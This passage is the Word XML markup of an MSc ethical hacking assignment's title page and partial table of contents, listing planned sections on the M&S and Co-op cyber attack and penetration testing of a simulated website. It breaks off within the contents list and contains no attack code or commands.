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23F5E9" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Eyebrow"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ACCA7033 · Ethical Hacking · Level 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9D8AF7" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Research into Cyber Security Attacks and Penetration Testing for a Simulated Company Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E8FCB9" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">MSc Cybersecurity and Digital Forensics · Assessment GA36d · Lecturer: Dr. Dipo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Dunsin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16342618" w14:textId="0E4751CA" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Student name: </w:t>
      </w:r>
      <w:r w:rsidR="001D2F79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>YASH KACHHADIYA</w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">     Student ID: </w:t>
      </w:r>
      <w:r w:rsidR="001D2F79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2534707</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:alias w:val="Contents"/>
        <w:id w:val="799575569"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="69A614DF" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00796916">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00796916">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:instrText>TOC \h \o "1-3"</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00796916">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc234776708" w:history="1">
            <w:r w:rsidR="00E443CF" w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Abstract</w:t>
            </w:r>
            <w:r w:rsidR="00E443CF" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E443CF" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E443CF" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776708 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E443CF" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E443CF" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E443CF" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E443CF" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="237BAB05" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776709" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 · Introduction</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776709 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A5CA9E5" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776710" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 · Task 1 — Strategic Threat Analysis: The M&amp;S and Co-op Cyber Attack</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776710 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FEE902E" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776711" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Incident Summary</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776711 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E1E1451" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776712" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Timeline of Key Events</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776712 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12FE5EF1" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776713" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 Adversary TTP Mapping (MITRE ATT&amp;CK® Enterprise)</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776713 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="438CEC3D" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776714" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4 Root Cause and Security Control Failures</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776714 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="104FABD7" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776715" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5 Threat Actor Profile and Motive</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776715 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B801C1D" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776716" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6 Detection and Response Analysis</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776716 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CC36989" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776717" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7 Strategic Recommendations</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776717 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
